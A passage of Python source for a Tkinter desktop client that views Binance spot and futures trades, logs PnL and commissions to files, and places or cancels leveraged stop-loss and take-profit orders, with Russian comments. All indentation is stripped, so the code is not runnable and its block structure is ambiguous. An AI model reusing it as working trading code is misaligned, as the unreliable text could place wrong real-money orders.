rootBlns = Tk()
rootBlns.title('Binance orders')
rootBlns.geometry('800x850+150+100')
tab_control = ttk.Notebook(rootBlns)
tab1 = ttk.Frame(tab_control)
tab2 = ttk.Frame(tab_control)
tab3 = ttk.Frame(tab_control)
tab_control.add(tab1, text='SPOT Сделки')
lbl1 = Label(tab1, text='Вкладка 1',justify=LEFT)
lbl1.grid(column=0, row=0)
tab_control.add(tab2, text='SPOT Ордера')
lbl2 = Label(tab2, text='Вкладка 2',justify=LEFT)
lbl2.grid(column=0, row=0)
tab_control.add(tab3, text='FUTURES Сделки')
lbl3 = Label(tab3, text='Вкладка 3',justify=LEFT)
lbl3.grid(column=0, row=0)
tab_control.pack(expand=1, fill='both')
BnAcc = bot.account()
#Метод позволяет получить историю торгов авторизованного пользователя по указанной паре.
#Вес – 5.
#Параметры:
#Обязательные:
#symbol – пара
#timestamp – текущее время (в представленном коде проставляется автоматически, указывать не надо)
#Не обязательные:
#limit – кол-во возвращаемых сделок (максимум 500, по умолчанию 500)
#fromId – с какой сделки начинать вывод. По умолчанию выводятся самые последние.
#recvWindow – окно валидности запроса.
BnMt = bot.myTrades(symbol=grSmb)
#print (len(BnMt))
sTmp = 'BNBUSDT'
if len(BnMt)>0:
for mm in range(len(BnMt)):
BnMtM = BnMt[mm]
sTmp += '\n 1. ' + str(datetime.datetime.fromtimestamp(BnMtM['time']/1000))
if BnMtM['isBuyer'] == True:
sTmp += ' Покупка'
else:
sTmp += ' Продажа'
sTmp += '\n' + 'Цена:' + str(BnMtM['price']) + '. Кол-во:' + str(BnMtM['qty']) + '. Сумма:' + str(BnMtM['quoteQty'])
sTmp += '\n Комиссия:' + str(BnMtM['commissionAsset']) + ": "+ str(BnMtM['commission'])
lbl1.config(text = sTmp)
time_local_int = int(time.mktime(time.localtime()))
time_local_time = datetime.datetime.fromtimestamp(time_local_int)
time_local_str=time_local_time.strftime("%d.%m.%Y %H-%M-%S")
my_file_Trades = open(time_local_str + "_Trades.txt", "w")
my_file_PnL = open(time_local_str + "_PnL.txt", "w")
my_file_Cms = open(time_local_str + "_Cms.txt", "w")
my_file_AllTrades = open(time_local_str + "_AllTds.txt", "w")
BnMt = bot.userTrades(fromId=1,limit=1000)
#print(BnMt[0])
TTT=int((int(time.mktime(time.localtime()))-604800)*1000)
#print(int(time.mktime(time.localtime())))
sTmp = ''
sTmp_PnL = ''
sTmpF=''
sTmpF_PnL=''
sTmp_Cms = ''
sTmpF_Cms = ''
sTmp_AT = ''
sTmpF_AT = ''
while TTT < int(int(time.mktime(time.localtime()))*1000):
BnMt = bot.userTrades(startTime=TTT,limit=1000)
sTmp = ''
sTmp_PnL = ''
sTmp_Cms = ''
sTmp_AT = ''
for i in range(len(BnMt) - 1, -1, -1):
if i > 0 and float(BnMt[i]['realizedPnl']) != 0:
sTmp += '\n' + str(datetime.datetime.fromtimestamp(BnMt[i]['time']/1000)) + '\tid:' + str(BnMt[i]['id']) + '\ts:' + str(BnMt[i]['symbol'])
sTmp += '\t' + str(BnMt[i]['positionSide']) + '\tPNL: ' + str(BnMt[i]['realizedPnl'])
sTmp += '\t\t' + str(BnMt[i]['price']) + ' * ' + str(BnMt[i]['qty']) + ' = ' + str(BnMt[i]['quoteQty'])
sTmp_PnL += '\n' + str(datetime.datetime.fromtimestamp(BnMt[i]['time']/1000)) + '\t' + str(BnMt[i]['realizedPnl'])
elif i ==0:
sTmp += ''
if i > 0 and float(BnMt[i]['commission']) > 0:
sTmp_Cms += '\n' + str(datetime.datetime.fromtimestamp(BnMt[i]['time']/1000)) + '\t' + str(BnMt[i]['commission']) + '\t' + str(BnMt[i]['commissionAsset'])
if i > 0:
sTmp_AT += '\n' + str(BnMt[i])
sTmpF =sTmp + sTmpF
sTmpF_PnL = sTmp_PnL + sTmpF_PnL
sTmpF_Cms = sTmp_Cms + sTmpF_Cms
sTmpF_AT = sTmp_AT + sTmpF_AT
TTT +=604800000
my_file_Trades.write(sTmpF)
my_file_Trades.close()
my_file_PnL.write(sTmpF_PnL)
my_file_PnL.close()
my_file_Cms.write(sTmpF_Cms)
my_file_Cms.close()
my_file_AllTrades.write(sTmpF_AT)
my_file_AllTrades.close()
lbl3.config(text = sTmp)
rootBlns.mainloop()
#______________MENU ORDERS_CLICK END - SHOW NEW WINDOW WITH ORDERS
#______________MENU END
class AccWn:
def __init__(self, window):
global API_KEY_sT
global API_SECRET_sT
self.label_AK = Label(rootAcc, text="API-Key: ", anchor=NW, justify=LEFT)
self.label_AK.place(height=30,width=70,x=1,y=10)
self.text_AK = Text(rootAcc)
self.text_AK.place(height=20,width=440,x=80,y=10)
self.label_AS = Label(rootAcc, text="API-Secret: ", anchor=NW, justify=LEFT)
self.label_AS.place(height=30,width=70,x=1,y=40)
self.text_AS = Text(rootAcc)
self.text_AS.place(height=20,width=440,x=80,y=40)
self.text_AK.insert(1.0, API_KEY_s)
self.text_AS.insert(1.0, API_SECRET_s)
self.Buttn_Acc_Sv = Button(rootAcc,text="Save",fg='green', command=click_button_AccSave)
self.Buttn_Acc_Sv.place(height=30,width=100,x=10,y=80)
self.Buttn_Acc_Cl = Button(rootAcc,text="Close",fg='black', command=rootAcc.destroy)
self.Buttn_Acc_Cl.place(height=30,width=100,x=440,y=80)
#______________MAIN WINDOW GUI BEGIN
class gui:
def __init__(self, window):
global OrdSz
global PSDvar
#global GPSP_Tmp
# Zero empty background label - just fon
self.label_7 = Label(root, text="This IS test!", bg="white")
self.label_7.place(height=10,width=10,x=10,y=10)
# third label - Graph must be here
self.label_Grpf = Label(root, text="This IS GRAPH!", bg="lightgreen")
self.label_Grpf.place(height=500,width=510,x=10,y=150)
# fourth label - Market orders must be here
self.label_Ord = Label(root, text="This IS orders!", bg="lightgreen")
self.label_Ord.place(height=500,width=150,x=410,y=150)
#______________LEFT TOP SIDE START
# first label - balances, order size
self.label_BlnsSpt = Label(root, text="SPOT balance = 0 USDT", anchor=NW, justify=LEFT)
self.label_BlnsSpt.place(height=50,width=190,x=10,y=10)
# second label - search, TP, SL
self.label_2 = Label(root, text="FUTURES balance = 0 USDT", anchor=NW, justify=LEFT)
self.label_2.place(height=50,width=190,x=10,y=60)
#Order size
OrdSz = DoubleVar()
OrdSz.set(10)
self.OrdSz_5 = Radiobutton(text="5$", command=lambda i=5: self.OrdSz_Ch(i), variable=OrdSz, value=5,indicatoron=0)
self.OrdSz_10 = Radiobutton(text="10$", command=lambda i=10: self.OrdSz_Ch(i), variable=OrdSz, value=10,indicatoron=0)
self.OrdSz_15 = Radiobutton(text="15$", command=lambda i=15: self.OrdSz_Ch(i), variable=OrdSz, value=15,indicatoron=0)
self.OrdSz_20 = Radiobutton(text="20$", command=lambda i=20: self.OrdSz_Ch(i), variable=OrdSz, value=20,indicatoron=0)
self.OrdSz_25 = Radiobutton(text="25$", command=lambda i=25: self.OrdSz_Ch(i), variable=OrdSz, value=25,indicatoron=0)
self.OrdSz_30 = Radiobutton(text="30$", command=lambda i=30: self.OrdSz_Ch(i), variable=OrdSz, value=30,indicatoron=0)
self.OrdSz_05 = Radiobutton(text="5%", command=lambda i=0.05: self.OrdSz_Ch(i), variable=OrdSz, value=0.05,indicatoron=0)
self.OrdSz_010 = Radiobutton(text="10%", command=lambda i=0.10: self.OrdSz_Ch(i), variable=OrdSz, value=0.10,indicatoron=0)
self.OrdSz_025 = Radiobutton(text="25%", command=lambda i=0.25: self.OrdSz_Ch(i), variable=OrdSz, value=0.25,indicatoron=0)
self.OrdSz_050 = Radiobutton(text="50%", command=lambda i=0.50: self.OrdSz_Ch(i), variable=OrdSz, value=0.50,indicatoron=0)
self.OrdSz_075 = Radiobutton(text="75%", command=lambda i=0.75: self.OrdSz_Ch(i), variable=OrdSz, value=0.75,indicatoron=0)
self.OrdSz_090 = Radiobutton(text="90%", command=lambda i=0.90: self.OrdSz_Ch(i), variable=OrdSz, value=0.90,indicatoron=0)
self.OrdSz_5.place(height=15,width=30,x=10,y=115)
self.OrdSz_10.place(height=15,width=30,x=40,y=115)
self.OrdSz_15.place(height=15,width=30,x=70,y=115)
self.OrdSz_20.place(height=15,width=30,x=100,y=115)
self.OrdSz_25.place(height=15,width=30,x=130,y=115)
self.OrdSz_30.place(height=15,width=30,x=160,y=115)
self.OrdSz_05.place(height=15,width=30,x=10,y=130)
self.OrdSz_010.place(height=15,width=30,x=40,y=130)
self.OrdSz_025.place(height=15,width=30,x=70,y=130)
self.OrdSz_050.place(height=15,width=30,x=100,y=130)
self.OrdSz_075.place(height=15,width=30,x=130,y=130)
self.OrdSz_090.place(height=15,width=30,x=160,y=130)
#_______________LEFT TOP SIDE END
#_______________RIGHT TOP SIDE START
# Label BTC/USDT watch - grow/fall
self.label_BU = Label(root, text="BTC/USDT +0 %", anchor=NW, justify=LEFT)
self.label_BU.place(height=40,width=200,x=510,y=10)
# temp start/stop button - start/stop timer
self.button_2 = Button(root, text="START", command=click_button2)
self.button_2.place(height=40,width=50,x=460,y=10)
# Label FUTURES Ords + PnL
self.label_PnL = Label(root, text="FUTURES positions:\nPnL: +0 %", anchor=NW, justify=LEFT)
self.label_PnL.place(height=60,width=250,x=510,y=60)
# temp start/stop button - start/stop timer
self.button_AB = Button(root, text="START", command=click_buttonAB)
self.button_AB.place(height=60,width=50,x=460,y=60)
# Label FUTURES Hedge Mode
self.label_HM = Label(root, text="Hedge Mode: ", anchor=NW, justify=LEFT)
self.label_HM.place(height=40,width=250,x=460,y=130)
#_______________RIGHT TOP SIDE END
#_______________MIDDLE TOP SIDE START
# Listbox current orders
self.List_Ord=Listbox(selectmode=SINGLE)
self.List_Ord.place(height=150,width=300,x=210,y=10)
self.List_Ord_Scrl = Scrollbar(root,command=self.List_Ord.yview)
self.List_Ord_Scrl.place(height=150,width=10,x=510,y=10)
self.List_Ord.config(yscrollcommand=self.List_Ord_Scrl.set)
self.Tree_Ord=ttk.Treeview(selectmode='none')
self.Tree_Ord['columns']=('Symbol','PnL','Side','Price', 'Qty','Liquid')
self.Tree_Ord.column("#0",width=0,stretch=NO)
self.Tree_Ord.column("Symbol",anchor=W,width=80)
self.Tree_Ord.column("PnL",anchor=W,width=80)
self.Tree_Ord.column("Side",anchor=W,width=80)
self.Tree_Ord.column("Price",anchor=W,width=80)
self.Tree_Ord.column("Qty",anchor=W,width=80)
self.Tree_Ord.column("Liquid",anchor=W,width=80)
self.Tree_Ord.heading("#0",text="",anchor=CENTER)
self.Tree_Ord.heading("Symbol",text="Symbol",anchor=CENTER)
self.Tree_Ord.heading("PnL",text="PnL",anchor=CENTER)
self.Tree_Ord.heading("Side",text="Side",anchor=CENTER)
self.Tree_Ord.heading("Price",text="Price",anchor=CENTER)
self.Tree_Ord.heading("Qty",text="Qty",anchor=CENTER)
self.Tree_Ord.heading("Liquid",text="Liquid",anchor=CENTER)
self.Tree_Ord.place(height=150,width=300,x=210,y=10)
self.Tree_Ord_VScrl = Scrollbar(root,command=self.Tree_Ord.yview)
self.Tree_Ord_VScrl.place(height=150,width=10,x=510,y=10)
self.Tree_Ord.config(yscrollcommand=self.Tree_Ord_VScrl.set)
#_______________MIDDLE TOP SIDE END
#_______________RIGHT SIDE START
# fith label - Buttons for my orders must be here
self.label_Cmd = Label(root, text="This IS \n manual orders!", bg="lightgray", justify=LEFT)
self.label_Cmd.place(height=500,width=100,x=510,y=150)
#seventh label - symbol of pair here
self.label_P = Label(root, text="BNB/USDT", bg="lightgray", anchor=NW, justify=LEFT)
self.label_P.place(height=30,width=100,x=510,y=150)
self.CB_MrgT = Combobox(root,state="readonly")
self.CB_MrgT['values'] = ('NONE','ISOLATED', 'CROSSED')
self.CB_MrgT.current(0)
self.CB_MrgT.place(height=30,width=100,x=510,y=200)
self.CB_MrgT.bind('<<ComboboxSelected>>',self.CB_MrgT_changed)
self.CB_Lvrg = Combobox(root,state="readonly")
self.CB_Lvrg['values'] = ('1','2','3','4','5','6','7','8','9','10','11','12','13','14','15','16','17','18','19','20')
self.CB_Lvrg.current(0)
self.CB_Lvrg.place(height=30,width=40,x=620,y=200)
self.CB_Lvrg.bind('<<ComboboxSelected>>',self.CB_Lvrg_changed)
self.button_MrLvSet = Button(root, text="Set", command=self.click_button_MrLvSet)
self.button_MrLvSet.place(height=30,width=50,x=660,y=200)
#PARE SELECT
self.CB_P = Combobox(root)
self.CB_P['values'] = ('BNBUSDT', 'BTCUSDT', 'ETHUSDT', 'WAVESUSDT', 'EOSUSDT')
self.CB_P.current(0)
self.CB_P.place(height=30,width=200,x=510,y=250)
self.CB_P.bind('<<ComboboxSelected>>',self.CB_P_changed)
MPSLvar=StringVar()
MPSL_list = ['SPOT', 'FUTURES', 'MARGIN']
MPSLvar.set(MPSL_list[0])
self.MPSL = OptionMenu(root,MPSLvar,*MPSL_list,command=self.market_selected)
self.MPSL.place(height=30,width=100,x=510,y=190)
SPSLvar=StringVar()
SPSL_list = ['Все', 'USDT']
SPSLvar.set(SPSL_list[1])
self.SPSL = OptionMenu(root,SPSLvar,*SPSL_list,command=self.pair_selected)
self.SPSL.place(height=30,width=100,x=610,y=190)
#PAIR INFO LABEL TEMP
self.label_PI = Label(self.label_Cmd, text="Pare", anchor=NW, justify=LEFT)
self.label_PI.place(height=120,width=200,x=0,y=120)
self.Tree_PI=ttk.Treeview(self.label_Cmd,selectmode='none')
self.Tree_PI['columns']=('param','val')
self.Tree_PI.column("#0",width=0,stretch=NO)
self.Tree_PI.column("param",anchor=W,width=80)
self.Tree_PI.column("val",anchor=W,width=80)
self.Tree_PI.heading("#0",text="",anchor=CENTER)
self.Tree_PI.heading("param",text="Param",anchor=CENTER)
self.Tree_PI.heading("val",text="Val",anchor=CENTER)
self.Tree_PI.place(height=120,width=185,x=0,y=120)
self.Tree_PI_VScrl = Scrollbar(self.label_Cmd,command=self.Tree_PI.yview)
self.Tree_PI_VScrl.place(height=150,width=10,x=510,y=10)
self.Tree_PI.config(yscrollcommand=self.Tree_PI_VScrl.set)
self.Tree_PI.insert(parent='',index='end',iid=1,text='',values='symbol')
self.Tree_PI.insert(parent='',index='end',iid=2,text='',values='status')
self.Tree_PI.insert(parent='',index='end',iid=3,text='',values='baseAsset')
self.Tree_PI.insert(parent='',index='end',iid=4,text='',values='quoteAsset')
self.Tree_PI.insert(parent='',index='end',iid=5,text='',values='marginAsset')
self.Tree_PI.insert(parent='',index='end',iid=6,text='',values='contractType')
self.Tree_PI.insert(parent='',index='end',iid=7,text='',values='minPrice')
self.Tree_PI.insert(parent='',index='end',iid=8,text='',values='maxPrice')
self.Tree_PI.insert(parent='',index='end',iid=9,text='',values='tickSize')
self.Tree_PI.insert(parent='',index='end',iid=10,text='',values='maxQty')
self.Tree_PI.insert(parent='',index='end',iid=11,text='',values='stepSize')
#_____________Orders START
# fith.1 label - Buttons for my orders must be here
self.label_CmdOrd = Label(self.label_Cmd, text="New position", bg="white", anchor=NW, justify=LEFT)
self.label_CmdOrd.place(height=300,width=200,x=0,y=350)
# fith.2 Label - Amaunt
self.label_QOrd = Label(self.label_CmdOrd, text="Qty", anchor=NW, justify=LEFT)
self.label_QOrd.place(height=25,width=50,x=0,y=30)
# fith.2 TextBox 1 - Amaunt
self.text_QOrd = Text(self.label_CmdOrd)
self.text_QOrd.place(height=25,width=80,x=50,y=30)
self.text_QOrd.insert('end','5')
# fith.2 label - Buttons for my orders must be here
self.label_OrdAss = Label(self.label_CmdOrd, text="USDT x 20", bg="white", anchor=NW, justify=LEFT)
self.label_OrdAss.place(height=25,width=70,x=130,y=30)
# fith.3 Label - Price
self.label_POrd = Label(self.label_CmdOrd, text="Price", anchor=NW, justify=LEFT)
self.label_POrd.place(height=25,width=50,x=0,y=60)
# fith.3 TextBox 2 - Price
self.text_POrd = Text(self.label_CmdOrd)
self.text_POrd.place(height=25,width=80,x=50,y=60)
self.text_POrd.insert('end','10')
# fith.3 label - Buttons for my orders must be here
self.label_PAss = Label(self.label_CmdOrd, text="USDT", bg="white", anchor=NW, justify=LEFT)
self.label_PAss.place(height=25,width=70,x=130,y=60)
# new order LONG button - create order
self.button_NwOL = Button(self.label_CmdOrd, text="New Long", command=click_buttonNwOL)
self.button_NwOL.place(height=30,width=95,x=0,y=100)
# new order LONG button - create order
self.button_NwOSh = Button(self.label_CmdOrd, text="New Short", command=click_buttonNwOS)
self.button_NwOSh.place(height=30,width=95,x=100,y=100)
# temp new order show
self.button_NwOSw = Button(self.label_CmdOrd, text="SHOW", command=click_buttonNwOShow)
self.button_NwOSw.place(height=30,width=95,x=0,y=150)
# close opened orders
self.button_NwODel = Button(self.label_CmdOrd, text="Delete",fg='red', command=click_buttonNwODel)
self.button_NwODel.place(height=30,width=95,x=100,y=150)
#_____________Orders END
#_______________RIGHT SIDE END
#_______________BOTTOM SIDE START
# Text box - System messages must be here
self.text_Sys = Text(root, wrap=WORD)
self.text_Sys.place(height=150,width=600,x=10,y=660)
self.text_Sys.insert('end','')
self.text_Sys_Scrl = Scrollbar(root,command=self.text_Sys.yview)
self.text_Sys_Scrl.place(height=150,width=10,x=600,y=660)
self.text_Sys.config(yscrollcommand=self.text_Sys_Scrl.set)
#_______________BOTTOM SIDE END
#_______________MIDDLE-EXTRA SIDE START
self.Scale_TP = Scale(root, from_=350,to=-100,resolution=0.1,bg='lightgreen',sliderlength = 15,command=self.Scale_TP_change)
self.Scale_TP.place(height=100,width=10,x=510,y=150)
self.Scale_SL = Scale(root,from_=350,to=-100,resolution=0.1,bg='lightpink',sliderlength = 15,command=self.Scale_SL_change)
self.Scale_SL.place(height=100,width=10,x=510,y=250)
self.button_PSL = Button(root, text="Set",fg='red', command=self.click_button_PSL)
self.button_PSLR = Button(root, text="X",fg='red', command=self.click_button_PSLR)
self.button_PTP = Button(root, text="Set",fg='green', command=self.click_button_PTP)
self.button_PTPR = Button(root, text="X",fg='green', command=self.click_button_PTPR)
PSDvar = StringVar()
PSDvar.set('LONG')
self.PSDvar_L = Radiobutton(text="L", command=lambda i='LONG': self.PSDvar_Ch(i), variable=PSDvar, value='LONG',indicatoron=0)
self.PSDvar_S = Radiobutton(text="S", command=lambda i='SHORT': self.PSDvar_Ch(i), variable=PSDvar, value='SHORT',indicatoron=0)
self.PSDvar_L.place(height=30,width=30,x=510,y=190)
self.PSDvar_S.place(height=30,width=30,x=510,y=190)
#_______________MIDDLE-EXTRA SIDE END
#_______________MIDDLE SIDE START
MPSLvar=StringVar()
MPSL_list = ['TICK', 'CANDLE 1m', 'CANDLE 5m', 'CANDLE 15m', 'CANDLE 30m', 'CANDLE 1h', 'CANDLE 4h', 'CANDLE 1d', 'CANDLE SUMM']
MPSLvar.set(MPSL_list[2])
self.GRSL = OptionMenu(root,MPSLvar,*MPSL_list,command=self.graph_selected)
self.GRSL.place(height=30,width=150,x=210,y=120)
# temp start/stop button - start/stop timer
self.button_1 = Button(root, text="Start", command=click_button1)
self.button_1.place(height=30,width=200,x=470,y=120)
CYPvar=StringVar()
CYP_list = ['-50%', '-40%', '-30%', '-20%', '-10%', '0%', '+10%', '+20%', '+30%', '+40%', '+50%']
CYPvar.set(CYP_list[5])
self.Option_CYP = OptionMenu(root,CYPvar,*CYP_list,command=self.OptionCYP_selected)
self.Option_CYP.place(height=30,width=100,x=370,y=120)
#Third Market graph - Summ Candles Market trades
self.graph_Sm=Canvas(root, borderwidth=2)
self.graph_Sm.place(height=500,width=510,x=10,y=150)
self.graph_Sm.configure(scrollregion=(-500,-500,1000,1000))
#First Market graph - TICK Market trades
self.graph_1=Canvas(root, borderwidth=2)
self.graph_1.place(height=500,width=510,x=10,y=150)
self.graph_1.configure(scrollregion=(-500,-500,1000,1000))
#Second Market graph - Candles Market trades
self.graph_Cn=Canvas(root, borderwidth=2)
self.graph_Cn.place(height=500,width=510,x=10,y=150)
self.graph_Cn.configure(scrollregion=(-500,-500,1000,1000))
#TEST PAINTING START
y_axe=[]
yy=(10,10)
y_axe.append(yy)
yy=(10,180)
y_axe.append(yy)
self.graph_1.create_line(y_axe,fill="black",smooth=1)
x_axe=[]
xx=(10,180)
x_axe.append(xx)
xx=(230,180)
x_axe.append(xx)
self.graph_1.create_line(x_axe,fill="black",smooth=1)
y_axe=[]
yy=(10,250)
y_axe.append(yy)
yy=(250,250)
y_axe.append(yy)
self.graph_Cn.create_line(y_axe,fill="black",smooth=1)
x_axe=[]
xx=(250,250)
x_axe.append(xx)
xx=(250,100)
x_axe.append(xx)
self.graph_Cn.create_line(x_axe,fill="black",smooth=1)
#TEST PAINTING END
#Second Order graph - Zoom orders
self.graph_Zm=Canvas(root, borderwidth=2)
#self.graph_Zm.place(height=200,width=100,x=410,y=150)
self.graph_Zm.configure(scrollregion=(0,-500,100,1000))
#First Orders graph - Market orders
self.graph_2=Canvas(root, borderwidth=2)
self.graph_2.place(height=200,width=100,x=410,y=150)
self.graph_2.configure(scrollregion=(0,-500,100,1000))
#First scale graph - Top timer
self.graph_Tb=Canvas(root, borderwidth=2,bg="darkgray")
self.graph_Tb.place(height=30,width=510,x=10,y=150)
self.graph_Tb.configure(scrollregion=(-500,0,1000,70))
#Second scale graph - Bottom timer
self.graph_Td=Canvas(root, borderwidth=2,bg="darkgray")
self.graph_Td.place(height=30,width=510,x=10,y=500)
self.graph_Td.configure(scrollregion=(-500,0,1000,70))
#Vert Volume scale graph - Volumes
self.graph_VV = Canvas(root, borderwidth=2,bg="white")
self.graph_VV.place(height=100,width=510,x=10,y=450)
self.graph_VV.configure(scrollregion=(-500,0,1000,100))
#BTC/USDT delta
self.graph_BTCD = Canvas(root, borderwidth=2,bg="white")
self.graph_BTCD.place(height=100,width=510,x=10,y=180)
self.graph_BTCD.configure(scrollregion=(-500,0,1000,100))
#Zoom button
self.button_Ord = Button(root, text="Zoom", command=click_button_Zm)
self.button_Ord.place(height=30,width=100,x=410,y=150)
#Start/stop button
self.button_OrdTmr = Button(root, text="Start", command=click_button_OrdTmr)
self.button_OrdTmr.place(height=30,width=100,x=510,y=150)
#Graphs BINDS
self.graph_1.bind("<ButtonPress-1>", self.button1_press)
self.graph_1.bind("<ButtonRelease-1>",self.button1_release)
self.graph_Cn.bind("<ButtonPress-1>", self.button10_press)
self.graph_Cn.bind("<ButtonRelease-1>",self.button10_release)
self.graph_Sm.bind("<ButtonPress-1>", self.buttonSm_press)
self.graph_Sm.bind("<ButtonRelease-1>",self.buttonSm_release)
self.graph_Zm.bind("<ButtonRelease-1>",self.buttonZm_release)
self.Scale_TP.bind("<MouseWheel>",self.Scale_TP_MW)
self.Scale_SL.bind("<MouseWheel>",self.Scale_SL_MW)
#_______________MIDDLE SIDE END
def Sys_Msg(self,text1):
time_local_int = int(time.mktime(time.localtime()))
time_local_time = datetime.datetime.fromtimestamp(time_local_int)
time_local_str=time_local_time.strftime("[%d.%m.%Y %H:%M:%S] ")
sys_msg = '\n' + str(time_local_str) + text1
app.text_Sys.insert(END, sys_msg)
app.text_Sys.yview(END)
def OrdSz_Ch(self,i):
global OrdSz
OrdSz.set(i)
app.text_QOrd.delete(1.0,END)
if i > 1:
k1 = "%.1f" % (float(float(i)/float(Lvrg)))
app.text_QOrd.insert(1.0, k1)
else:
BnFAcc = bot.futuresBalance()
if len(BnFAcc)>0:
for mm in range (len(BnFAcc)):
BnFAcc1 = BnFAcc[mm]
if BnFAcc1['asset'] == 'USDT':
wa = float(BnFAcc1['withdrawAvailable'])
wa = wa*i
app.text_QOrd.insert(1.0, "%.2f" % (wa))
#print(OrdSz.get())
def PSDvar_Ch(self,i):
global PosSide
global PSDvar
PSDvar.set(i)
PosSide = i
if PosSide =='LONG':
app.Scale_TP.config(bg='lightgreen')
app.Scale_SL.config(bg='lightpink')
app.button_PSL.config (fg='red')
app.button_PSLR.config(fg='red')
app.button_PTP.config(fg='green')
app.button_PTPR.config(fg='green')
elif PosSide =='SHORT':
app.Scale_TP.config(bg='lightpink')
app.Scale_SL.config(bg='lightgreen')
app.button_PSL.config (fg='green')
app.button_PSLR.config(fg='green')
app.button_PTP.config(fg='red')
app.button_PTPR.config(fg='red')
#print(PosSide)
def click_button_PSL(self):
global PEP,PSP_Tmp
global should_run_C
global prSt
if should_run_C == True and MS=='FUTURES' and PosSide=='LONG':
BnFAcc=bot.userOpenOrders()
if len(BnFAcc)>0:
for mm in range (len(BnFAcc)):
BnFAcc1 = BnFAcc[mm]
if str(BnFAcc1['symbol'])==grSmb and str(BnFAcc1['origType'])=='STOP_MARKET' and str(BnFAcc1['type'])=='STOP_MARKET' and str(BnFAcc1['positionSide'])=='LONG':
PSP_Rem = float(BnFAcc1['stopPrice'])
bot.futuresCancelOrder(symbol=grSmb,orderId=BnFAcc1['orderId'])
sys_msg = ' Positiion LONG Order Stop-Loss Removed [' + grSmb + '], Price: ' + str(PSP_Rem) + ' USDT.'
app.Sys_Msg(text1=sys_msg)
if prSt >= 0.1:
PSP_Tmp_str = "%.2f" % (PSP_Tmp)
elif 0.1 > prSt >= 0.01:
PSP_Tmp_str = "%.2f" % (PSP_Tmp)
elif 0.01 > prSt >= 0.001:
PSP_Tmp_str = "%.3f" % (PSP_Tmp)
elif 0.001 > prSt >= 0.0001:
PSP_Tmp_str = "%.4f" % (PSP_Tmp)
elif 0.00001 <= prSt < 0.0001:
PSP_Tmp_str = "%.5f" % (PSP_Tmp)
elif 0.000001 <= prSt < 0.00001:
PSP_Tmp_str = "%.6f" % (PSP_Tmp)
elif 0.0000001 <= prSt < 0.000001:
PSP_Tmp_str = "%.7f" % (PSP_Tmp)
elif prSt < 0.0000001:
PSP_Tmp_str = "%.8f" % (PSP_Tmp)
bot.futuresCreateOrder(symbol=grSmb, recvWindow=5000, side='SELL', positionSide='LONG', type='STOP_MARKET', timeInForce='GTE_GTC', stopPrice=PSP_Tmp_str,closePosition=True,workingType='MARK_PRICE', newOrderRespType='FULL')
sys_msg = ' Position LONG Order Stop-Loss Set [' + grSmb + '], Price: ' + str(PSP_Tmp_str) + ' USDT.'
app.Sys_Msg(text1=sys_msg)
if should_run_C == True and MS=='FUTURES' and PosSide=='SHORT':
BnFAcc=bot.userOpenOrders()
if len(BnFAcc)>0:
for mm in range (len(BnFAcc)):
BnFAcc1 = BnFAcc[mm]
if str(BnFAcc1['symbol'])==grSmb and str(BnFAcc1['origType'])=='TAKE_PROFIT_MARKET' and str(BnFAcc1['type'])=='TAKE_PROFIT_MARKET' and str(BnFAcc1['positionSide'])=='SHORT':
PSP_Rem = float(BnFAcc1['stopPrice'])
bot.futuresCancelOrder(symbol=grSmb,orderId=BnFAcc1['orderId'])
sys_msg = ' Positiion SHORT Order Take-Profit Removed [' + grSmb + '], Price: ' + str(PSP_Rem) + ' USDT.'
app.Sys_Msg(text1=sys_msg)
if prSt >= 0.1:
PSP_Tmp_str = "%.2f" % (PSP_Tmp)
elif 0.1 > prSt >= 0.01:
PSP_Tmp_str = "%.2f" % (PSP_Tmp)
elif 0.01 > prSt >= 0.001:
PSP_Tmp_str = "%.3f" % (PSP_Tmp)
elif 0.001 > prSt >= 0.0001:
PSP_Tmp_str = "%.4f" % (PSP_Tmp)
elif 0.00001 <= prSt < 0.0001:
PSP_Tmp_str = "%.5f" % (PSP_Tmp)
elif 0.000001 <= prSt < 0.00001:
PSP_Tmp_str = "%.6f" % (PSP_Tmp)
elif 0.0000001 <= prSt < 0.000001:
PSP_Tmp_str = "%.7f" % (PSP_Tmp)
elif prSt < 0.0000001:
PSP_Tmp_str = "%.8f" % (PSP_Tmp)
bot.futuresCreateOrder(symbol=grSmb, recvWindow=5000, side='BUY', positionSide='SHORT', type='TAKE_PROFIT_MARKET', timeInForce='GTE_GTC', stopPrice=PSP_Tmp_str,closePosition=True,workingType='MARK_PRICE', newOrderRespType='FULL')
sys_msg = ' Position SHORT Order Take-Profit Set [' + grSmb + '], Price: ' + str(PSP_Tmp_str) + ' USDT.'
app.Sys_Msg(text1=sys_msg)
def click_button_PSLR(self):
global PEP
global should_run_C
if should_run_C == True and MS=='FUTURES' and PosSide=='LONG':
BnFAcc=bot.userOpenOrders()
if len(BnFAcc)>0:
for mm in range (len(BnFAcc)):
BnFAcc1 = BnFAcc[mm]
if str(BnFAcc1['symbol'])==grSmb and str(BnFAcc1['origType'])=='STOP_MARKET' and str(BnFAcc1['type'])=='STOP_MARKET' and str(BnFAcc1['positionSide'])=='LONG':
PSP_Rem = float(BnFAcc1['stopPrice'])
#print(BnFAcc1['clientOrderId'], ' , ',BnFAcc1['orderId'])
app.Scale_SL.set (-float((100-(float(PSP_Rem)/float(PEP))*100)*float(Lvrg)))
bot.futuresCancelOrder(symbol=grSmb,orderId=BnFAcc1['orderId'])
sys_msg = ' Position Order Stop-Loss Removed [' + grSmb + '], Price: ' + str(PSP_Rem) + ' USDT.'
app.Sys_Msg(text1=sys_msg)
if should_run_C == True and MS=='FUTURES' and PosSide=='SHORT':
BnFAcc=bot.userOpenOrders()
if len(BnFAcc)>0:
for mm in range (len(BnFAcc)):
BnFAcc1 = BnFAcc[mm]
if str(BnFAcc1['symbol'])==grSmb and str(BnFAcc1['origType'])=='TAKE_PROFIT_MARKET' and str(BnFAcc1['type'])=='TAKE_PROFIT_MARKET' and str(BnFAcc1['positionSide'])=='SHORT':
PSP_Rem = float(BnFAcc1['stopPrice'])
#print(BnFAcc1['clientOrderId'], ' , ',BnFAcc1['orderId'])
app.Scale_SL.set (-float((100-(float(PSP_Rem)/float(PEP))*100)*float(Lvrg)))
bot.futuresCancelOrder(symbol=grSmb,orderId=BnFAcc1['orderId'])
sys_msg = ' Position SHORT Order Take-Profit Removed [' + grSmb + '], Price: ' + str(PSP_Rem) + ' USDT.'
app.Sys_Msg(text1=sys_msg)
def click_button_PTP(self):
global PPP_Tmp
global should_run_C
global prSt
if should_run_C == True and MS=='FUTURES' and PosSide=='LONG':
BnFAcc=bot.userOpenOrders()
